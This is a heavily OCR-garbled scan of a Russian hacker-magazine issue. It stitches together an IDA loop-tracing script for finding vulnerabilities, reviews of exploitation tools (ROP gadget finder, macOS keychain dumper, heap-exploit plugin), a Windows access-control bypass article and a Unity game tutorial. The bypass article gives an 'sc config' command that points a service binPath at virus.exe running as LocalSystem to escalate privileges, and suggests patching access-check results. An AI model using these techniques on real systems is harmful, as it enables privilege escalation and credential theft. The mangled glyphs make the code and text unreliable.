-Рог асісіг іп ЬосІуасИг: 

і-р СеіМпет(асІсІг) іп ііегіізі: 

# Ищущий да зааппендится 

Ііег5.аррепс1( асісіг) 
геіигп ііегз 

Затем для каждого элемента списка итераторов вызываем 
трассирующую функцию 

-Рог асісіг іп і іегз: 

ге§=СеіОрпсІ(асІсІг.,0) 

ТгасеѴа1(ге§.епсІас1сІг) 

Трассировщик обращает внимание на инструкции-пере- 
сыльщики, инструкцию саІІ, если трассируемый регистр еах. 
Инструкция хог, часто использующаяся для того, чтобы захард- 
кодить счетчик, подлежит обязательному поиску в качестве 
признака неинтересного цикла. Арифметические инструкции 
(могущие быть причастными к ошибкам преобразования чисел 




Рис. 3. Потенциально уязвимый цикл в тзНІтІ.сІІІ 



между знаковыми и беззнаковыми) стоят, как обычно, 
на особом счету. 



# Подозревая 5І%песІ/ип5І§песІ тізтаІісЬ 

5и5ресіесІіп5=["тоѵ5х" . "бііЬ" . "асісі"] 

# Посыльщики 

тоѵе ГБ = [ " тоѵ " , " тоѵ 2 х " ] \ 

# Виды адресации [еЬр+езі] . [еЬр+еБІ+8] 
тетіуре5=[3.,4] 

# Берем адрес начала фу н кц и и 
рагепі = СеІіРипсІііопАІіІіг ( асісіг , 0) 

мЬіІе асісіг != рагепі ог асісіг ! =0х-р-р-р-р-р-р-р-р: 

# На случай чанкед-фѵнкций 

# ищем начало фрагмента 

і-р 6еіМпет(асІсІг’)=="ри5Ь" апсі <5еіОрпсІ(асІсІг.0)=="еЬр" : 

ргіпі "ргоіо^" 

Ьгеак 

# Получаем ссылку 

асісіг = Кб гбіВ( асісіг) 

# Ищем пациента 

і-р СеіОрпсІ (асісіг., 0)==ге§: 

# Если значение возвращается функцией 

і-р 6еіМпет(асІсІг)=="с а1Г І апсі ге§=="еах" : 
ргіпі ге§. "геіигпесі Ьу саІІ" 

Ьгеак 

# Обнуление счетчика - частое событие 

і-р СеіМпеітКасІсІг^^'хог" : 

ргіпі ге§., "хогесГ 

ЬагсІсосІесІ=1 

Ьгеак 

# Встреча с подозреваемыми без алиби 

і-р СеіМпет(асІсІг) іп зизресіесІіпБ апсі асісіг \ 
поі іп ііегз: 

ргіпі "БизресіесІ іпб" . ге^. "аі асісіг" .Ьех(асісіг) 
ѵи1псоипі+=1 

# Или объект трассировки меняется 

# или разводим руками: из памяти пришло, 

# в память уйдет 

і-р ОіеіМпет( асісі г) іп тоѵегз: 

і-р СеіОрТуре(асІсІг,1)==1: 

ге§=СеіОрпсІ ( асісі г л 1 ) 
і-Р беіОрТѵреС асісіг Л) іп тетіуреБ: 
ргіпі ге§."-Ргот те тогу" 

Ьгеак 



Итак, анализ циклов — неординарная задача. Рассмотренный 
скрипт обладает ограниченным функционалом. Расширив его, 
исследователь уязвимостей может облегчить задачи поиска уязви- 
мостей в двоичном коде. ЗС 
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СОБИРАЕМ РОР-ГРУППУ 

Сегодня уже трудно представить себе эксплойт 
без использования ПОР-последовательностей 
(коротенькие цепочки инструкций кода 
из какого-то модуля]. Причиной тому повсе- 
местное распространение йЕР (появившегося 
в 2004 году], который препятствует выполне- 
нию классического шелл-кода в стеке и куче. 
РОР-цепочки позволяют разработчикам экс- 
плойтов обходить йЕР. 

Подход простой. Если в программе из помех 
только йЕР, то находим модуль без А5І_Р и на 
его основании строим наши гаджеты. Но если 
в эксплуатируемой программе все модули 
скомпилированы с А5І_Р, то либо ищем способ 
подгрузить в ее адресное пространство модуль 
без А5І_Р и на его основе строим гаджеты, либо 
находим утечку адреса в программе и тут уже 
будем строить РОР-последовательность от 
модуля, от которого мы получили адрес. ЛТ- 
шелл-код — это отдельная история. 

Итак, РОР-гаджеты нам поможет искать 
инструмент с незамысловатым названием 
гр++. Программа полностью написана на С++ 
и позволяет обнаружить гаджеты в РЕ/ЕІ.Р/ 
МасЬ-0 х86/х64 бинарных файлах, тем самым 
значительно расширяя область атакуемых 
платформ. Утилита также поддерживает 
Іпіеі и АТ&Т синтаксис инструкций и вывод 
информации о заголовке исполняемого би- 
нарного файла. 



ПОТРОШИМ 5ѴѴР 

АбоЬе 5ѴѴР Іпѵезіідаіог — это кроссплат- 
форменный инструменте 6111-интерфейсом, 
позволяющий тестерам, разработчикам или 
исследователям безопасности быстро анали- 
зировать 5ѴѴР-файлы для улучшения качества 
и безопасности своих приложений. Причем 
реализован как статический, так и динамиче- 
ский анализ. 

Статические возможности: 

• дизассемблирование А52/А53 кода; 

• редактирование БѴѴР файлов; 

• отображение 5ѴѴР-тегов; 

• просмотр дополнительной инфомрации 
по 5ѴѴР-файлу (150-объекты и рег зііе 
параметры). 

Динамические возможности: 

• вызов функций из 5ѴѴР-файла; 

• загрузка 5ѴѴР в различные контексты; 

• взаимодействие через локальные 
соединения и отправка сообщений Асііоп 
Меззаде Рогтаі (АМР). 

5ѴѴР Іпѵезіідаіог содержит расширяемый 
фаззер для 5ѴѴР-приложений и АМР-сервисов. 
Также этот набор инструментов содержит 
кодеры и декодеры для 5ѴѴР-данных и базовый 
А53-компилятор. 



СРЕДА ТЕСТИРОВАНИЯ ДЛЯ АШРОЮ 

АпбгоісІ Зесигііу Еѵаіиаііоп Ргатеѵѵогк (А5ЕР) 
анализирует приложения для ОС АпбгоісІ 
с точки зрения их потенциальной опасности. 
Оценивается не только само приложение, 
но и его способы работы с пользовательскими 
данными. Программа способна анализировать 
как конкретный АРК-файл, так и программы 
на реальном устройстве. 

Для тестирования приложения помеща- 
ются на «виртуальное устройство» АпбгоісІ 
ѴИиаІ йеѵісе — своеобразный «черный 
ящик» или песочница, но возможен анализ 
и на реальном устройстве. Затем генериру- 
ются методы взаимодействия с программой 
(вводданных, скроллинг, нажатия на кнопки) 
и изучается ее реакция. А5ЕР регистрирует 
сетевой трафик, активность ядра, сохраня- 
ет дампы памяти, регистрирует активные 
процессы на каждом этапе работы програм- 
мы, после чего информация анализируется 
специальным модулем А5ЕР, который ищет 
признаки вредоносного поведения. Програм- 
ма отслеживает: 

• сетевую активность; 

• сетевойтрафик; 

• известныеуязвимости; 

• ассоциируемые разрешения; 

• используемые АРІ-вызовы 

и проверяет приложение по черному списку. 
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7 утилит для исследования безопасности 
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Автор: 

оіізрб 

цві.: 

сосіе.доодіе. 

сот/р/оизрд 

Система: 

Ыпих/ВЗО/Мас 



ТЕ5Т САБЕ ГЕНЕРАТОР ДЛЯ ФАЗЗИНГА 



Пабатза — генератор тестов для 
проверки надежности ПО с по- 
мощью фаззинга. Любой фаззер 
должен состоять как минимум из 
трех частей: 

1) генератора тестов; 

2) запускающей части; 

3) монитора падений. 

Расіатза как раз и берет на себя 
решение первого этапа. От этого 
этапа зависит, насколько каче- 
ственно/полно пройдет тестирова- 
ние приложений и, соответствен- 
но, будет найдено ошибок. 

На вход Расіатза получает 
легитимные файлы, а на выходе 
выдает измененные, потенциально 
приводящие к падению программы 



тесты. Рабазта ничего не знает 
об устройстве формата файлов 
на входе и лишь, анализируя их, 
строит предположения, на основе 
которых делает те или иные пре- 
образования. При этом сгенери- 
рованные тесты программа может 
как выдавать в стандартный вы- 
вод или файлы, так и отправлять 
на определенный ір:рогІ. Так, для 
сетевого фаззинга можно записать 
трафик с помощью ІсрГІоѵѵ и подать 
его на вход Расіазта. С помощью 
данного проекта были найдены 
уязвимости в таких программах, 
как ІіЬхзІІ, АсгоЬаІ Реабег, МогіІІа 
РігеГох, СЬготе, РРтред, МісгозоЙ 
ЕхсеІ, ІіЬШГ, ѴѴеЬкіІ, бгір и многих 
других. 
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Автор: 

-ііііібо Заіопеп 

ИРЬ: 

Нир5://діЩиЬ.сот/ 

Іиизо/кеусііаіпсіитр 

Система: 
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Автор: 

Зіеѵеп Зееіеу 

ИРЬ: 
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Система: 

ѴѴіпсіоѵѵб 




АБУАКІСЕБ 5ЕСІІРІТѴ 
ТЕ5ТІ N6 РБАТРОРМ 

ІгопѴѴА5Р — платформа для тестирования 
безопасности веб-приложений. Инструмент 
был впервые представлен на конферен- 
ции ЗесигіІуЬуІе 2011 в Индии. Платформа 
имеет приятный 6111-интерфейс, не требует 
установки, распространяется с открытым 
исходным кодом и полностью написана на С#. 
Данный инструмент призван оптимизировать 
использование ручного и автоматического 
тестирования пентестером. Особенности 
платформы: 

• менеджер сканирований; 

• встроенный сгаѵѵіег; 

• ргоху; 

• автоматическое и полуавтоматическое 
сканирование; 

• ручноетестирование приложений; 

• интегрированное скриптовое окружение 
на РуіЬоп/РиЬу; 

• движок статического анализа баѵаБсгірІ; 

• поддержка плагинов на Пи Ьу и РуіЬоп. 

Результаты можно легко импортировать в 
650Ы, ХМІ_, баѵа сериализованные объекты. 
При этом разработчик предусмотрительно 
учел такие вещи, как поля логинов, С5НР- 
токены, капчу, многоэтапные формы ввода, 
так что никаких проблем при их обработке у 
проекта не возникнет. 



УДОБСТВО В РАЗРЕЗ 
С БЕЗОПАСНОСТЬЮ 

В 05 X существует специальное защищен- 
ное/зашифрованное хранилище для кон- 
фиденциальных данных пользователей под 
названием кеусЬаіп. В нем могут храниться: 
логин:пароль от аккаунтов почтового кли- 
ента, аккаунтов в браузере и для доступа 
к ѴѴі- Рі-сетя м, пин-коды, номера кредитных 
карт и так далее. 

Компания Арріе пошла на компромисс 
между безопасностью и юзабилити, а в резуль- 
тате пользователь гооі может читать кеусЬаіп- 
секреты всех залогиненных пользователей 
в системе (если они не включили опцию Іоскеб 
для кеусбаіп). Таким образом, программа 
не эксплуатирует никакой уязвимости в без- 
опасности 05 X, а работаеттак, как и задумы- 
валось разработчиками ОС. Данный инстру- 
мент показывает и реализует возможности 
постэксплуатации в данной ОС. 

Данная техника отличается скоростью 
и работоспособностью на всех версиях 05 X, 
и не требует никаких постоянных изменений 
в атакуемой системе. Смысл атаки заклю- 
чается в поиске мастер-ключа от кеусЬаіп в 
памяти процесса зесигііусі по определенному 
паттерну. Получаем около 20 вариантов, их 
нетрудно перебрать и найти ѵѵгарріпд ключ, с 
помощью которого уже можно получить доступ 
к учетным данным. 



НЕАР-НЕАР-НЕАРЕР 

Разработка полнофункционального эксплойта, 
использующего переполнение в куче, чрезвы- 
чайно сложная задача, которая, естественно, 
зависит от множества факторов. 

Чтобы облегчить и ускорить процесс, для 
отладчика Іттипііу йеЬиддег был написан 
плагин Ьеарег. Функционал плагина достаточ- 
но широк: 

• разбор РЕВ и ТЕВ; 

• сборуказателей на функции; 

• сбор саІІзДтрз, которые используют пере- 
записываемые и статическиеуказатели; 

• анализ кучи, структуры фронтенда кучи, 
структуры бэкенда кучи, сегментов кучи, 
чанков кучи, кеша кучи; 

• анализ/патчинг РгееІ_І5ІІпІІ5е структуры; 

• перехватразличныхфункций; 

• изменение функций или структур данных; 

• эвристическое определение возможности 
эксплуатации уязвимости. 

0 возможностях каждой команды плагина 
можно без проблем узнать, введя в команд- 
ной строке: 

Міеарег беір <со тшапсІ> 

Втекущей версии Ьеарег поддерживает 
менеджер кучи ѴѴі пХР, нов ближайшее время 
будет поддержка и ѴѴіпсІоѵѵз 7/8. 
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КОВЫРЯЕМ 
БРОНЮ ѴѴІ N 00ѴѴ5 



ВЫЯСНЯЕМ, ЧТО 
ТАКОЕ АСІ./ОАСІ. 
И КАК ЭТО МОЖНО 
ЗАЭКСПЛОИТИТЬ 




ЛГАКЫШС 



Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. 

Ни редакция, 
ни автор не несут 
ответственности 
за любой возможный 
вред, причиненный 
материалами данной 
статьи. 



Сегодня мы поговорим о том, что несет в себе 
система контроля доступа в ОС ѴѴіпсІоѵѵз. Ого- 
ворюсь сразу, что данный вопрос немножко 
необычен для изучения, — вроде бы известно, 
о чем речь, однако на поверку выходит, что 
написано про нее довольно мало. Впрочем, для 
нас это не преграда — попробуем рассмотреть 
доспехи ѴѴіпсІоѵѵз изнутри и порассуждать о 
возможных способах их обхода. 



ВВЕДЕНИЕ 



Если присмотреться внимательнее, то ничего сверхсложного в си- 
стеме контроля доступа ОС ѴѴіпсІоѵѵз нет. Как и в других операци- 
онных системах, главное, что нужно усвоить, — это кто и что может 
делать в операционной системе. 

Система разграничения прав пользователей хорошо известна 
любителям *п іх-Ііке систем, тогда как в ОС ѴѴіпсІоѵѵз она довольно 
прозрачна (см. рисунок 1) и поэтому не столь заметна для обычного 
пользователя, исключая грамотных сисадминов, которые напря- 
мую с этим связаны. 

Поэтому для обеспечения контроля за операциями над неким 
абстрактным объектом в системе ѴѴіпсІоѵѵз должна быть уверена 
в правильности идентификации каждого пользователя. Имен- 
но по этой причине ѴѴіпсІоѵѵз требует от пользователя входа с 
аутентификацией прежде, чем ему будет позволено обращаться 
к системным ресурсам. 

В целом система проверки прав доступа выглядиттак: процесс 
запрашивает описатель объекта (об этом подробнее ниже), а уж по- 
том диспетчер объектов и система защиты решают, можно ли этому 
процессу предоставить описатель, разрешающий доступ к объекту. 

Модель контроля доступа в ОС ѴѴіпсІоѵѵз требует, чтобы 
процесс заранее — еще до открытия абстрактного объекта — 
указывал, какие операции он собирается выполнять над этим 
объектом. Ну типа, представь, Великая Отечественная, в хату 
вежливо стучатся фашисты с автоматами и говорят: «Это мы, 
бабка, фашисты, мы хотим отобрать у тебья хлеб, яйки, сметана и 
спросить, где партизаны». 

В свою очередь, система («бабка») проверяеттип доступа, за- 
прошенный процессом, и, если такой доступ разрешен, процесс 
получит описатель, который позволит ему (фашистам) выполнить 
операции над объектом. 

Таким аіагт-событием для системы, к примеру, являет- 
ся открытие объекта по его имени вызовом кегпеі-функции 



096 



ХАКЕР 11 /166/2012 







Ковыряем броню ѴѴіпсІоѵѵз 



с 



^ Рі'тіпііеешп-в ^ п г ^ізягр Слтгіідшлііоп 



$всміі*у 



Дійир Оі иіОТ іМШН 



А^гчіпі: 1 і иіоі : I 



^.ёгпгу^гаАагЕІ 



ві 

(2 АміНеШіе^ееІ им» 

Рш« І1і»і ( - \Роѵ*еі 1_Іш±) 

#33 5Ѵ5ТЕМ 



^мтЫого іе< двптщіток 



А»)И 



РСрпчсіУі? 



НълйСъМн* 
5йРМ№ЙИН 
ТйІ:.е ОигйгаЫр 
5р*сілі Р«тіі*ісск 



Рн *рвс Ы рапвшц от (от «Е^акиЗ йМііді, 






□К 



]Г 



СапееІ 



Рис.1. Хорошо знакомая сисадминам картинка 



пНОЬОрепОЬ)есіВуІ\Іате. При вызове этой функции диспетчер 
объектов ищет его в своем пространстве имен. Не будем опи- 
сывать сейчас то, что происходит при этом процессе, — долго, 
муторно и непонятно. 

Все в итоге сводится к тому, что система вызывает «дья- 
вола». Хотя нет, вру, на самом деле следует вызов функций 
пі!0ЬСЬеск0Ь)есіАссез5 — > пНЗеАссеззСЬеск (функция АссеззСЬеск 
для пользовательского режима). Эта функция, наверное, является 
одной из ключевых для всей модели защиты ОС ѴѴіпсІоѵѵз (впрочем, 
как и другие 5е*-функции). Она принимает параметры защиты объ- 
екта, идентификационные данные защиты процесса и запрашива- 
емый тип доступа и в зависимости от результата «рассмотрения» 
вернетТРІІЕ или РАІ.5Е. 

Но это так, самое общее и приблизительное описание лишь 
основного момента защиты. На самом деле процесс проверки до- 
ступа, прав и привилегий очень сложен. 



ЭЛЕМЕНТЫ БРОНИ 



К основным элементам модели доступа ѴѴіпсІоѵѵз можно отнести 
идентификаторы защиты — 5Ю и маркеры доступа (так называе- 
мые токены). 

5Ю — это идентификатор защиты, который ѴѴіпсІоѵѵз присва- 
ивает пользователям системы, локальным и доменным группам, 
локальным компьютерам, доменам и членам доменов. 5Ю — это 
числовое значение переменной длины, которое ты наверняка не 
раз встречал, выглядит оно примерно так: 5-1-5-21-12345678910- 
12345678910-12345678910-1228. 

Например, 5-1-1-0 означает группу, объединяющую всех поль- 
зователей. Группа 5-1-2-0 объединяет пользователей, которые ре- 
гистрируются на терминалах, физически подключенных к системе. 

Маркеры доступа, наверное, основной элемент защиты 
ѴѴіпсІоѵѵз. Он описывает контекст защиты процесса (потока) и со- 
держит в себе информацию, описывающую привилегии, учетные 
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Рис. 2. Наиболее интересные поля маркера доступа 



записи и группы, сопоставленные с процессом или потоком. 
Механизм защиты ѴѴіпсІоѵѵз использует два элемента маркера, 
определяя, какие элементы доступны и какие операции можно 
выполнить. 

Первый элемент — это 5Ю учетной записи пользователя и 
5Ю групп, к которым этот пользователь принадлежит. Данный 
элемент используется для определения, можно ли предоставить 
запрошенный тип доступа к защищаемому объекту, например 
чтению файла. 

Второй элемент — это список привилегий, сопоставленных 
с маркером. Он используется для определения того, что может 
делать поток. Например, программно выключать операционную 
систему. Маркер доступа описан структурой ТОКЕІМ (см. рисун- 
ки 2-4). Остальные поля маркера используются лишь для инфор- 
мационных нужд. 



КОПНЕМ ПОГЛУБЖЕ 



Ну и последний важный элемент защиты — это дескриптор защиты 
объекта. Если ты знаешь, на уровне ядра ОС ѴѴіпсІоѵѵз оперируетта- 
ким понятием, как объект (в отличие от никсов, где все — «файл»). 
То есть объектом будет являться файл, процесс, поток, примитивы 
синхронизации, АРС, йРС, прерывание и так далее. 

У каждого такого объекта есть свой описатель, который по сути 
своей является самостоятельной структурой. Но это не главное — 
укаждого из объектов есть заголовок, всегда описываемый одной 
и той же структурой ОВЭЕСТ_НЕАОЕР. Вот она-то нас и интересует. 



МАРКЕРЫ ДОСТУПА — ЭТО 
ОСНОВНОЙ ЭЛЕМЕНТ ЗАЩИТЫ 
ЖІЫ00ѴѴ5. ОН ОПИСЫВАЕТ 
КОНТЕКСТ ЗАЩИТЫ ПРОЦЕССА 
(ПОТОКА) И ПРИВИЛЕГИИ 
ДОСТУПА ДЛЯ НЕГО 



ХАКЕР 11 /166/2012 



097 









МАШАКЕ 



кй> Ер госты ЭВО 1 

Ірг*с*Й* ЗМ 1 
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Рис. 3. С использованием ѴѴіпОВб можно найти адрес маркера доступа для 
процесса СМР.ЕХЕ... 
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Рис. 4. ...и просмотреть детали маркера — какими правами он наделен 



Потому что именно в ней содержится указатель на дескриптор за- 
щиты объекта, в котором заключена информация о том, кто и что 
может делать с данным объектом. 

Главное, что нужно уяснить, — дескриптор защиты хранит спи- 
ски управления избирательным доступом (0АС1_). Они конкретно 
расписывают, кто может получить доступ к объекту и какой именно 
доступ может быть предоставлен. АСІ_'ы состоят из заголовка 
и перечисляемых элементов АСЕ. Каждый АСЕ содержит 5Ю и ма- 
ску доступа, причем АСЕ могут быть четырех типов: «доступ разре- 
шен», «доступ отклонен», «разрешенный объект» и «запрещенный 
объект». Разница между типами «доступ разрешен» и «разрешен- 
ный объект» только в том, что последний тип используется лишь 
в Асііѵе йігесіогу. 



И ЧТО ТЕПЕРЬ СО ВСЕМ ЭТИМ ДЕЛАТЬ? 



Главное, что, во-первых, доступ к объектам системы можно моди- 
фицировать. Каким образом — ищи код на диске. Он небольшой 
и в целом должен быть тебе понятен. 

Во-вторых, можно получать доступ к защищенным объектам, 
используя огрехи самой системы. Ибо, как я уже говорил, контроль 
доступа в ѴѴіпсІоѵѵз — вещь сложная, а чем сложнее система, тем 
больше вероятность появления в ней уязвимостей. 

В середине 2000-х на багтреках промелькнуло несколько 
малозаметных сообщений о найденных багах в ѴѴіпсІоѵѵз ХР, 
связанных с возможностью «несанкционированного» поднятия 
привилегий от І_осаІ Бегѵісе до І_осаІ Бузіет. Суть уязвимости 
заключалась в том, что службам ѴѴіпсІоѵѵз ББйР и иРпР, действу- 
ющим с правами І_осаІ Бегѵісе, можно было изменять параметры 
любого сервиса в системе, после чего, используя стандартные 
привилегии запуска/останова службы (вспомни про запуск 
сервиса из командной строки — зс зіагі/ зс зіор), остановить ее и 
перезапустить с параметрами сопПд, указав в параметре ЬіпРаіЬ 
путь к ехе для старта: 
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Рис. 5. Вот где собака порылась! 



Идем далее. Хочу отметить, что серьезную брешь в безопас- 
ности образует стороннее программное обеспечение, особенно 
те программы, которые регистрируют себя в качестве ѴѴіпсІоѵѵз- 
сервиса. И все это опять-таки из-за особого отношения ОС ѴѴіпсІоѵѵз 
к такого типа программам — многие разработчики ПО оставляют 
локальной группе Еѵегуопе возможность конфигурировать созда- 
ваемый сервис вышеуказанным способом. 

Особо трепетного отношения к себе требуютте доверенные 
программы, которые пытаются изменить характеристики какого-то 
файла при помощи вызова асІѵарі32!5еіРіІе5есигіІу (хотя и устарев- 
шей) с маской доступа ѴѴРІТЕ ОАС. 

Необходимо также упомянуть о такой полусекретной технике, 
как обращение к системным вызовам напрямую через системные 
шлюзы ІІ\ІТ2е/5Ѵ5ЕІ\ІТЕР. Я уже как-то описывал ее в одном из 
прошлых номеров ][. Ее суть состоит в прямом вызове прерывания 
с передачей в стек определенных параметров — в результате мы, 
во-первых, получаем обход любых юзермодных хуков систем- 
ных функций, а во-вторых, для вызова опасных функций, типа 
І\Ш_оасЮгіѵег, нам совсем не требуется повышения прав. В примере 
с тем же І\Ш_оасШгіѵег, скажем, система посмотрит на наши права 
и потребуетустановки привилегии 5е_І_оасІ_0гіѵег_РгіѵіІеде вы- 
зовом АсЦизіРгіѵіІедеО, что не есть гуд. Однако в этот же самый 
момент мы совершенно спокойно можем напрямую обратиться 
к системному шлюзу ІЫТ2е/5У5ЕМТЕР. 

Ну и в заключение стоитупомянуть, что никто не мешает 
скомпрометировать сам ход выполнения функций проверки 
доступа и привилегий, таких как АссеззСЬеск, РгіѵіІедеСЬеск, 
АгеАпуАссеззезбгапІесІ и некоторых других, верно? Чуть подпра- 
вим возвращаемые результаты, и будет нам счастье :). 



ЗАКЛЮЧЕНИЕ 



И про старуху бывает порнуха, как сказал кто-то из великих. 
Несмотря на то что с выходом семерки положение дел с правами 
и привилегиями значительно улучшилось, в защитном механизме 
ѴѴіпсІоѵѵз все еще можно отыскать лазейки, которые могут поста- 
вить на колени эту ОС. 

В статье не рассмотрены такие понятия, какучетные записи и ло- 
кальные аккаунты, и поверь мне, там тоже не все так чисто, как хо- 
телось бы МісгозоК. Но это уж оставим тебе в качестве домашнего 
задания. Удачного компилирования и да пребудет с тобой Сила! ПС 



СМР>зс сопб§ зІіирісІБегѵісе ЬіпРа1:И=с : \ѵігиз . ехе оЬд= \ 
" . МосаІБѵзіет" раззмогс^" " 

СМР>зс зіор ЗІіирісІБегѵісе 
СМР>зс зіагіі ЗІіирісІБегѵісе 



УШИ 






Об основах ѴѴіпсІоѵѵз Ассезз Сопігоі можно 
прочитать здесь — ЫЫу/рЩаи. а также в неплохих 
статьях на тему: ЫЩу/ЫМОкоу и Ьіі.Іу/ѴхУѵѵіА . 



Код, демонстрирующий 
смену ОАСІ. для файла/ 
папки, ждеттебя на диске. 
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ПИШЕМ ИГРЫ НА КОЛЕНКЕ 

Продолжаем разговор об инди- 
играх. С продажей и публикацией 
разобрались, теперь нужно не за- 
быть о самом главном — о создании 
самой игры. В центре внимания — 
популярный движок и среда раз- 
работки Ііпііу. 

Почему именно Ііпііу? Во-первых, 
поддержка почти всех существую- 
щих платформ, включая мобильные 
ОС и консоли. Во-вторых, наличие 
бесплатной версии. В-третьих — 
популярность, благодаря чему 
движок активно развивается, 
хорошо документирован и имеет 
хорошее комьюнити. Что еще нужно, 
спрашивается? 




КОДИНГ 



АКАДЕМИЯ ІЖІХОЮ 
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СТЕГАН0ГРАФДЛЯѴШ00ѴѴ5РН0НЕ 

Для новогоурока по разработке для 


112 


УРОК №5: БАЗЫ ДАННЫХ 

Наш эпичнейший учебник по высоким 


118 


ѴѴіпсІоѵѵ5 РЬопе была выбрана необычная 




нагрузкам почти подошел к концу. 





задача. В этой статье мы рассмотрим 
создание приложения, которое позволит 
скрыватьтекст в изображениях. 



В предпоследнем уроке поговорим о 
том, как решать проблемы, связанные 
охранением данных. 



ХРАБРЫЙ ПОРТНОЙ 

Патчсеты для ядра Ыпихпозволяютзначи- 
тельно изменить поведение «пингви- 
на» — повысить производительность или 
безопасность, расширитьфункционал. Но 
как выбрать нужный набор? 



ІЖІХОШ 



5УЫ/АСК 






В КЛЕТКЕ 




ПУТЕВОДИТЕЛЬ ПО ВИРТУАЛЬНЫМ 




124 


Изучаем новую систему виртуализации 
ЫпихСопІаіпегз, сделанную по мотивам 


128 


МИРАМ 

Осень принесла множество новинок 


133 



знаменитых«тюрем»РгееВ50. Стало ли в мире виртуализации от МісгобоЙ, 

лучше за новой решеткой? ѴМѵѵаге и Сіігіх. Рассмотрим самое 

интересное. 



ПОСТАНОВКА НАКОНТРОЛЬ 

Тотальный аудит — за лог безопасности 
сети. Представляем рассказ о соответ- 
ствующихинструментахв различных 
версияхѴѴіпсІоѵѵз. 
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Влад Орлов 



ДЕЛАЕМ КРОССПЛАТФОРМЕННУЮ ИГРУ § 
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Мода на инди-игры в самом разгаре. Они популярны, их пишут, 
в них играют, на них иногда даже зарабатывают приличные день- 
ги. Не будем оставаться в стороне от трендов и расскажем тебе, 
как можно легко и просто написать свою кроссплатформенную 
игрушку. 



ЧТО ТАКОЕ иыітѵзо? 



ІІпіІуЗО — мощный движок для создания ЗР- и 2 Б- игр. Несомненные плюсы его в том, 
что игровые скрипты можно писать на С#, ЭаѵаБсгір* и Воо, а готовые игры собирать под 
ѴѴіп/Мас/І_іпих, І05, Апсігоісі, ѴѴеЬ (свой веб-плеер) и даже игровые консоли. Разумеется, 
если вы купили нужные модули. Базовая версия распространяется бесплатно, что тоже 
большой плюс. 



Ф 



ВМЕСТО ВСТУПЛЕНИЯ 



Сегодня мы напишем нашу первую игру 
на ІІпіІуЗО. Это будет простенькая аркадка, 
где космический корабль прорывается сквозь 
гущу астероидов и стреляет по ним. Для по- 
нимания всего того, что мы будем делать, 
необходимы поверхностное знакомство с ООП 
и знание синтаксиса языка С#, потому что 
писать мы будем именно на нем. Ну и, разуме- 
ется, сам движок ІІпіІуЗО, который бесплатно 
берется с официального сайта: ипіІѵЗсІ.сот . 

Итак, приступим, пожалуй. 



НАЧИНАЕМ 



Первое, что необходимо сделать, — это соз- 
дать пустой проект: Рііе — > Ыеѵѵ Рго)есГ 

Тут проблем быть не должно. Нужно лишь 
указать расположение папки с игрой и, в на- 
шем случае, не выбирать ни один из предло- 
женных пакетов. 
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Пишем игры на коленке 



Перед тобой рабочее пространство ре- 
дактора ІІпіІуЗО, отдаленно напоминающее ре- 
дактор 30-графики, что является плюсом, ибо 
человек, работавший хоть раз в Зсіз Мах, Мауа 
или другом подобном редакторе, будет чув- 
ствовать себя тут как рыба в воде (см. рис. 1). 

Для начала пройдемся по окнам редактора. 
В окне «Бсепе» отображается рабочая область 
текущей игровой сцены, в «Вате» — то, как 
она же будет выглядеть в игре. В «НіегагсЬу» 
отображаются все объекты, находящиеся на 
сцене. В «Іпзресіог» — все свойства вы- 
бранного объекта, а «Рго)есІ» содержит все 
ресурсы, используемые в игре, как то: матери- 
алы, скрипты, сцены, префабы (о них — чуть 
дальше), текстуры и так далее. 

Для начала пройдем в меню «Рііе» и выбе- 
рем «Баѵе Бсепе». В предложенной редакто- 
ром папке создадим папку «Бсепез» и со- 
храним в нее текущую пустую сцену, назвав 
ее Всепеі. В окне «Рго)есІ» появится папочка 
«Всепез» с вложенной в нее сценой. Вообще, 
хороший тон работы в юнити — создавать 
отдельные папки для разных типов ресурсов, 
иначе в скором времени ты рискуешь поте- 
ряться в ресурсах своего проекта. 

Как ты видишь, на сцене уже есть один объ- 
ект — это камера «Маіп Сатега». Давай выде- 
лим ее в окне «НіегагсМу» и зададим сначала 
свойство РозШоп во вкладке «Тгапзіюгпп» — 

X = О, У = 0 , 1 = -10, свойство Рго)есІіоп 
во вкладке «Сатега» сменим на СИЬодгарЫс, 
а Віге поставим 10. У нас будет 20-игра, и по- 
тому нам нужна ортографическая камера, 
показывающая все объекты двумерными. Мы 
передвинули камеру, чтобы она смотрела в 
условный центр пространства, на координаты 
(0, 0, 0). Так будетудобнее оперировать коорди- 
натами объектов на сцене в дальнейшем. 

Теперь создадим нашего игрока. Это 
будет примитив — куб, который играет роль 
межзвездного корабля. В ІІпіІуЗО есть не- 
большой набор примитивов, которые очень 
удобно использовать в самом начале работы 



над игрой. Итак, бате 0Ь)ес1 — > Сгеаіе ОіЬег — > 
СиЬе. Сразу зададим его положение (ты уже 
знаешь, как это делать, по аналогии с каме- 
рой), X = 0, У = 0 , 1 = 0. Теперь куб появится 
и в окне «бате», в самом центре экрана. 

Но серый куб — это скучно. Потому давай 
в окне «Рго)есІ» создадим папку «Маіегіаіз», 
а в ней — новый материал, который назовем, 
например, РІауег. В «Іпзресіог» можно за- 
дать цвет, пусть это будет красный. А те- 
перь — волшебство! Берем наш материал 
РІауег в «Рго)есІ» и просто перетаскиваем 
его на объект СиЬе в «НіегагсЬу». Все! Теперь 
корабль поменял цвет. Но что это? Он темный. 
Это потому, что мы еще не добавили освеще- 
ние на сцену, бате ОЬ)есІ — > Сгеаіе ОіЬег — > 
бігесііопаі І_ідЫ. Так гораздо лучше! И можно 
не париться с координатами источника света, 
Оігесііопаі І_ідМ освещает все вокруг с одина- 
ковой интенсивностью. 

Самое время поместить наш космический 
корабль в нужную позицию на сцене — то есть 
в самый низ экрана. Но для начала выста- 
вим свойства отображения. В окне «бате» 
сейчас стоит Ргее Азресі, выберем вместо него 
Біапсіаіопе (1024 х 768) и теперь, выделив наш 
куб-корабль в окне «Бсепе», перетащим его 
вниз так, чтобы он «касался» самого нижнего 
края сцены. Отслеживать это будем в окне 
«бате». Все просто! У меня координаты куба 
получились (0, -10, 0). 

На данный момент корабль совсем не ко- 
рабль, а просто скучный кубик в пространстве. 
Пора оживить его, приступаем к написанию 
скрипта. 

В «Рго)есІ» создадим папку «Бсгіріз», 
а в ней новый скрипт на С#, назовем его 
РІауегБсгірІ. Сразу же назначим нашему кора- 
блю этот скрипт, перенеся его на наш корабль- 
куб в «НіегагсИу» точно так же, как мы пере- 
носили материал. 

Щелкнем по скрипту два раза, и откроется 
штатный редактор Мопойеѵеіор с загруженным 
